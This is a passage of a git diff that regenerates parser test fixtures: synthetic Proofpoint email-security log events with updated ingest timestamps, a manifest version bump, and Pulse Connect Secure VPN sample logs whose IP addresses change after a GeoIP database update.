dtempo cvtd[atnula]: warn ditautf low mod=iquidex cmd=olup", "event": { - "ingested": "2021-06-09T13:10:40.442197200Z" + "ingested": "2021-12-14T14:54:22.370442223Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/01/27T05:21:06.rspici snisi queued-aglife[766]: olor: to=etquasia, delay=nula, xdelay=quiacons, mailer=uisa, pri=xeacommo, relay=[10.65.174.31], dsn=atur, stat=issu", "event": { - "ingested": "2021-06-09T13:10:40.442201400Z" + "ingested": "2021-12-14T14:54:22.370442617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/02/10T12:23:41.ite tasnul note[tuserr]: note tise very-high s=tnul m=expl x=ess module=quiad action=cancel size=6084", "event": { - "ingested": "2021-06-09T13:10:40.442205600Z" + "ingested": "2021-12-14T14:54:22.370443006Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/02/24T19:26:15.llumq tenim spam_init[eiusmo]: warn ainc medium mod=antiumdo type=ecill cmd=iduntu id=pisci engine=sunt definitions=texplica", "event": { - "ingested": "2021-06-09T13:10:40.442209600Z" + "ingested": "2021-12-14T14:54:22.370443396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 ate action_checksubmsg s=con m=tqu x=eirur action=accept score=tametco submsgadjust=mquisnos spamscore=25.933000 suspectscore=cit malwarescore=siar phishscore=isn adultscore=veniamq bulkscore=lup tests=iumtotam", "event": { - "ingested": "2021-06-09T13:10:40.442213700Z" + "ingested": "2021-12-14T14:54:22.370443783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/03/25T09:31:24.voluptas velill regulation_init[rspic]: err orinrepr high mod=meum type=borumSec cmd=aecatcup id=snisiut action=allow dict=nre file=inB", "event": { - "ingested": "2021-06-09T13:10:40.442217900Z" + "ingested": "2021-12-14T14:54:22.370444172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/04/08T16:33:58.upt ulamc cvt_detect[cept]: err aedictas low pid=4253 mod=orio cmd=gna name=ici status=success err=olu", "event": { - "ingested": "2021-06-09T13:10:40.442222Z" + "ingested": "2021-12-14T14:54:22.370444575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/04/22T23:36:32.seq moll queued-VoltageEncrypt[2861]: sunt: from=dquianon, size=956, class=itesse, nrcpts=iamqui, msgid=quide, proto=igmp, daemon=cididun, relay=str4641.domain [10.151.31.58]", "event": { - "ingested": "2021-06-09T13:10:40.442226Z" + "ingested": "2021-12-14T14:54:22.370444970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/05/07T06:39:06.cti rumSecti session_throttle[riamea]: info eca very-high s=tes mod=equam cmd=isi rule=iaecon ip=10.119.38.124 rate=rep crate=remap limit=deri", "event": { - "ingested": "2021-06-09T13:10:40.442230600Z" + "ingested": "2021-12-14T14:54:22.370445356Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 scipit high pid=745 mod=cvt cmd=detect cmd=borisnis name=onorumet status=success err=isiutali", "event": { - "ingested": "2021-06-09T13:10:40.442234800Z" + "ingested": "2021-12-14T14:54:22.370445744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 aedict low mod=cvtd cmd=miurere", "event": { - "ingested": "2021-06-09T13:10:40.442240600Z" + "ingested": "2021-12-14T14:54:22.370446128Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/06/19T03:46:49.seq rumSe queued-vdedc2v5[tatnonp]: rprt ommo[4821]: idunt: to=expl, delay=olore, xdelay=uian, mailer=atuserro, pri=madminim, relay=[10.52.47.230] [10.113.119.47], dsn=quioff, stat=iuntN", "event": { - "ingested": "2021-06-09T13:10:40.442245100Z" + "ingested": "2021-12-14T14:54:22.370446508Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/07/03T10:49:23.mquis lorsi filter[tetura]: rprt eeufug high mod=modt sig=iduntutl", "event": { - "ingested": "2021-06-09T13:10:40.442249400Z" + "ingested": "2021-12-14T14:54:22.370446912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 expl very-high pid=prehende mod=cvtd cmd=encrypted encrypted=lup", "event": { - "ingested": "2021-06-09T13:10:40.442253900Z" + "ingested": "2021-12-14T14:54:22.370447301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 umd sumd medium s=dat mod=session_judge cmd=aUtenima module=turQuis rule=taevi", "event": { - "ingested": "2021-06-09T13:10:40.442258200Z" + "ingested": "2021-12-14T14:54:22.370447679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/08/15T07:57:06.ercitati eve spf_run[rro]: err oeiusmo very-high s=cusanti m=tconse x=rem mod=tseddoei cmd=teursint rule=etMa duration=llita", "event": { - "ingested": "2021-06-09T13:10:40.442262300Z" + "ingested": "2021-12-14T14:54:22.370448088Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/08/29T14:59:40.nostrum orroquis av_init[eumi]: info tvo low mod=tuser type=mmo cmd=eve id=nbyCicer vendor=scipit engine=equuntu definitions=quamni signatures=turveli", "event": { - "ingested": "2021-06-09T13:10:40.442266500Z" + "ingested": "2021-12-14T14:54:22.370448472Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 ihilm medium s=caboNemo mod=mltr uptas", "event": { - "ingested": "2021-06-09T13:10:40.442270600Z" + "ingested": "2021-12-14T14:54:22.370448848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/09/27T05:04:49.dol exe info[tis]: note oluptat low eid=tinvolup pid=497 status=tvol", "event": { - "ingested": "2021-06-09T13:10:40.442274900Z" + "ingested": "2021-12-14T14:54:22.370449235Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 eritqui medium s=atus mod=session_judge cmd=tassitas module=obea rule=velite", "event": { - "ingested": "2021-06-09T13:10:40.442278800Z" + "ingested": "2021-12-14T14:54:22.370449617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/10/25T19:09:57.lore luptate av_init[eritqu]: err elites very-high mod=tamr type=serr cmd=usci id=unturmag vendor=dexeaco engine=lupta definitions=ura signatures=oreeufug", "event": { - "ingested": "2021-06-09T13:10:40.442282900Z" + "ingested": "2021-12-14T14:54:22.370450Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/11/09T02:12:32.ree itten milter_listen[quipexea]: warn orsitv medium mod=nostrum cmd=autodita addr=10.27.154.247", "event": { - "ingested": "2021-06-09T13:10:40.442286900Z" + "ingested": "2021-12-14T14:54:22.370450388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/11/23T09:15:06.utfugi ursintoc dkimv_type[tio]: rprt mmodicon: high mod=trudex unexpected response type=tvol", "event": { - "ingested": "2021-06-09T13:10:40.442308700Z" + "ingested": "2021-12-14T14:54:22.370450773Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/12/07T16:17:40.rehen uaeab session_throttle[ptat]: warn mipsu high s=eturadip mod=amquaera cmd=rsitamet rule=leumiur ip=10.253.121.154 rate=olesti crate=edquia limit=ihi", "event": { - "ingested": "2021-06-09T13:10:40.442315100Z" + "ingested": "2021-12-14T14:54:22.370451153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 21 23:20:14 emoenimi high pid=5895 mod=cvt cmd=detect cmd=mqu name=onorume status=unknown err=veleu", "event": { - "ingested": "2021-06-09T13:10:40.442332400Z" + "ingested": "2021-12-14T14:54:22.370451644Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 dquia high s=bori mod=mltr dipi", "event": { - "ingested": "2021-06-09T13:10:40.442345300Z" + "ingested": "2021-12-14T14:54:22.370452040Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 quovolu high s=dexe mod=mltr nemul", "event": { - "ingested": "2021-06-09T13:10:40.442349700Z" + "ingested": "2021-12-14T14:54:22.370452446Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/02/02T20:27:57.quatur dminim mail_msg[ptatevel]: warn aperiame very-high s=eirured mod=sequamn cmd=perspici module=inimve rule=aea action=allow attachments=5821 rcpts=296 routes=ptat size=4878 guid=nde hdr_mid=quame qid=orumwri subject=atisu spamscore=66.849000 virusname=tse duration=rad elapsed=iat", "event": { - "ingested": "2021-06-09T13:10:40.442353900Z" + "ingested": "2021-12-14T14:54:22.370452834Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/02/17T03:30:32.lorum suntexpl sm-msp-queue[iqu]: rprt iquamqu[6293]: audant: to=obeata, ctladdr=uredol, delay=uptat, xdelay=toditau, mailer=uiad, pri=nvolupta, relay=[10.80.133.120] [10.147.147.248], dsn=onpr, stat=uira", "event": { - "ingested": "2021-06-09T13:10:40.442358100Z" + "ingested": "2021-12-14T14:54:22.370453216Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/03/03T10:33:06.aliqu sequine regulation_refresh[utaliqui]: note isciv very-high mod=econ type=aborio cmd=rve id=catcup action=deny dict=runtmoll file=busBon", "event": { - "ingested": "2021-06-09T13:10:40.442362100Z" + "ingested": "2021-12-14T14:54:22.370453600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/03/17T17:35:40.occaeca dan queued-alert[pta]: err upt[4762]: itaedict: to=eroi, delay=onemull, xdelay=mdo, mailer=labore, pri=lorem, relay=[10.68.159.207] [10.232.240.177], dsn=estq, stat=quasiarc", "event": { - "ingested": "2021-06-09T13:10:40.442373Z" + "ingested": "2021-12-14T14:54:22.370453990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/04/01T00:38:14.tDuisaut uel warn[dexerc]: info vol high eid=agn status=\"iqu file: quamqua\"", "event": { - "ingested": "2021-06-09T13:10:40.442380700Z" + "ingested": "2021-12-14T14:54:22.370454372Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 uunturm very-high mod=regulation type=iaconseq cmd=init id=tseddo action=cancel dict=rissusci file=ectetur", "event": { - "ingested": "2021-06-09T13:10:40.442386200Z" + "ingested": "2021-12-14T14:54:22.370454746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 quaturve medium mod=zerohour type=gnamali cmd=init id=iumtota version=issusci", "event": { - "ingested": "2021-06-09T13:10:40.442390900Z" + "ingested": "2021-12-14T14:54:22.370455130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/05/13T21:45:57.ecillumd iumto dmarc_type[sequatu]: rprt tiumtot: medium mod=mdoloree type=que cmd=inBCSed id=cteturad policy_cache_entries=umq", "event": { - "ingested": "2021-06-09T13:10:40.442404500Z" + "ingested": "2021-12-14T14:54:22.370455519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 reseo quam very-high s=pariat mod=mail_env_rcpt cmd=icaboNe r=4840 value=lumd verified=tiaec routes=lorem", "event": { - "ingested": "2021-06-09T13:10:40.442413Z" + "ingested": "2021-12-14T14:54:22.370455924Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 seq low mod=info sys=lorsita evt=deny active=itation expires=utlabo msg=tat", "event": { - "ingested": "2021-06-09T13:10:40.442418300Z" + "ingested": "2021-12-14T14:54:22.370456327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 ididu medium s=epteurs mod=mail_env_from cmd=itse value=rever ofrom=sBonoru qid=ecatcu tls=ntoccae routes=iscive notroutes=amni host=etconse5657.api.lan ip=10.118.249.126 sampling=dminimv", "event": { - "ingested": "2021-06-09T13:10:40.442422600Z" + "ingested": "2021-12-14T14:54:22.370456711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/07/10T01:56:14.rep nostru access_load[docons]: info emipsumq low mod=qua type=modit cmd=tatione id=aedicta", "event": { - "ingested": "2021-06-09T13:10:40.442426600Z" + "ingested": "2021-12-14T14:54:22.370457103Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 uas high s=reeufu mod=mail_env_from cmd=umexe value=xce ofrom=omnisis qid=corporis tls=tco routes=stiaec notroutes=Cicero host=ven5410.mail.host ip=10.170.55.203 sampling=deom", "event": { - "ingested": "2021-06-09T13:10:40.442430600Z" + "ingested": "2021-12-14T14:54:22.370457491Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/08/07T16:01:23.Utenima nse info[umq]: note enim low mod=meaquei sys=snisiu evt=allow active=atev expires=vento msg=litsed", "event": { - "ingested": "2021-06-09T13:10:40.442434700Z" + "ingested": "2021-12-14T14:54:22.370457877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 susc taed high s=mipsumd mod=mail_continue-system-sendmail cmd=eiusmo action=block err=sum", "event": { - "ingested": "2021-06-09T13:10:40.442438600Z" + "ingested": "2021-12-14T14:54:22.370458263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 ipex low s=upta cmd=send profile=ivel qid=tmollita rcpts=tionofd", "event": { - "ingested": "2021-06-09T13:10:40.442442600Z" + "ingested": "2021-12-14T14:54:22.370458649Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/09/19T13:09:05.ccaec repreh http_listen[imven]: note usan very-high mod=idolo cmd=olup addr=10.199.46.88", "event": { - "ingested": "2021-06-09T13:10:40.442446800Z" + "ingested": "2021-12-14T14:54:22.370459037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/10/03T20:11:40.nulapari beataevi queued-VoltageEncrypt[3274]: eruntmol: from=plicab, size=5930, class=dmin, nrcpts=sum, msgid=lloinve, proto=ggp, daemon=nim, relay=Sedutper7794.www5.domain [10.154.22.241]", "event": { - "ingested": "2021-06-09T13:10:40.442450900Z" + "ingested": "2021-12-14T14:54:22.370459426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/10/18T03:14:14.nvol doloreeu cvtd_encrypted[elillumq]: info loremeum medium pid=obeataev mod=rrorsit encrypted=aincid", "event": { - "ingested": "2021-06-09T13:10:40.442456600Z" + "ingested": "2021-12-14T14:54:22.370459810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 nis info pid=472 iin /uteiru: xer", "event": { - "ingested": "2021-06-09T13:10:40.442460500Z" + "ingested": "2021-12-14T14:54:22.370460215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/11/15T17:19:22.isauteir eritquii soap_listen[atevelit]: note dese low mod=ionula cmd=itaed addr=10.38.111.125", "event": { - "ingested": "2021-06-09T13:10:40.442464300Z" + "ingested": "2021-12-14T14:54:22.370460593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 ationem high mod=spam type=ing cmd=load id=ollita", "event": { - "ingested": "2021-06-09T13:10:40.442468100Z" + "ingested": "2021-12-14T14:54:22.370461Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/12/14T07:24:31.nih ncididu queued-default[4250]: STARTTLS=gitsed, relay=estla4081.corp, version=meumf, verify=rExce, cipher=quisquam, bits=boreet", "event": { - "ingested": "2021-06-09T13:10:40.442472Z" + "ingested": "2021-12-14T14:54:22.370461388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/proofpoint/manifest.yml b/packages/proofpoint/manifest.yml index 98de92ad504..b2beae762a4 100644 --- a/packages/proofpoint/manifest.yml +++ b/packages/proofpoint/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: proofpoint title: Proofpoint Email Security Logs -version: 0.5.0 +version: 0.5.1 description: Collect logs from Proofpoint Email Security devices with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log b/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log index 12d75f55caa..f9db0cf39a0 100644 --- a/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log +++ b/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log @@ -1,7 +1,7 @@ -Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32 -Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723. -Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop -Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off) -Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off) -Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured -Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan. \ No newline at end of file +Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156 +Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723. +Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop +Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off) +Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off) +Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured +Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan. \ No newline at end of file diff --git a/packages/pulse_connect_secure/changelog.yml b/packages/pulse_connect_secure/changelog.yml index 3bd00b6ba1b..75dea7240db 100644 --- a/packages/pulse_connect_secure/changelog.yml +++ b/packages/pulse_connect_secure/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.0.1" changes: - description: initial release diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log index 0793d631385..1fa48896d42 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log @@ -1,10 +1,10 @@ -Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off) -Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off) -Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM -Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM -Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password -Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 55.53.160.32 -Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed -Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM -Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM -Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr +Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off) +Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off) +Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM +Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM +Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password +Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] 